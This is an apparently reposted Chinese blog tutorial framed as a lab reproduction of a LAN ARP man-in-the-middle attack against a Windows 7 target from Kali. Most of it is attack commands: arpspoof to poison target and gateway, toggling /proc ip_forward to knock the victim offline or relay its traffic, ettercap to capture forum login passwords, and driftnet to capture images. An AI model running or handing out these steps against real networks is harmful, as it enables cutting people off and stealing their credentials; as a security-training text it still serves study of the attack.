zoukankan      html  css  js  c++  java
  • 【漏洞复现】局域网 ARP 中间人攻击 获取他人账号密码


    日期:2019-07-18 14:24:42
    更新:
    作者:Bay0net
    介绍:如何在局域网内,窃取其他用户的账号密码?


    0x01、 漏洞环境

    攻击工具 arpspoof 基本用法:

    arpspoof -i eth0 -t 【目标 IP】 【网关】
    arpspoof -i eth0 -t  【网关】【目标 IP】
    

    攻击机

    IP:192.168.43.67
    操作系统:Kali 2019
    

    靶机

    IP:192.168.43.135
    操作系统:Win7 旗舰版 SP1
    

    攻击机和靶机,在同一个局域网内,局域网的网关是 192.168.43.1

    0x02、攻击过程

    使靶机断网

    在 kali 上,需要开启转发 IP 的功能,否则靶机会断网,所以可以使用该方法让靶机断网。

    先欺骗靶机,开启两个命令行界面,分别输入下面两条命令

    # 欺骗靶机
    arpspoof -i eth0 -t 192.168.43.135 192.168.43.1
    arpspoof -i eth0 -t 192.168.43.1 192.168.43.135
    

    然后再开一个命令行,输入以下命令,关闭 ip_forward 功能。

    # 0 代表关闭 ip_forward 功能
    echo '0' > /proc/sys/net/ipv4/ip_forward
    

    靶机已经无法连接互联网,一直在转圈。

    如果想恢复主机的网络,再使用下面的语句即可。

    echo '1' > /proc/sys/net/ipv4/ip_forward
    

    窃取密码

    演示的网站:http://www.discuz.net/forum.php

    第一步,还是欺骗靶机,开启两个命令行界面,分别输入下面两条命令

    # 欺骗靶机
    arpspoof -i eth0 -t 192.168.43.135 192.168.43.1
    arpspoof -i eth0 -t 192.168.43.1 192.168.43.135
    

    第二步,开启转发

    echo '1' > /proc/sys/net/ipv4/ip_forward
    

    第三步,使用工具进行嗅探

    ettercap -Tq -i eth0
    

    此时在靶机输入账号密码进行登录,kali 会自动分析并且把密码显示出来。

    点击登录,查看一下 kali,已经抓到了账号密码。

    嗅探图片

    driftnet -i eth0
    

  • 相关阅读:
    Flask路由+视图补充
    Flask登录认证
    Flask
    初识Flask
    redis 注意事项
    Linux安装python和更新pip
    Django 导入配置文件
    redis 5种类型
    redis 支持事务
    数组乱序与数组拆解
  • 原文地址:https://www.cnblogs.com/v1vvwv/p/local-area-network-arp-attack.html
Copyright © 2011-2022 走看看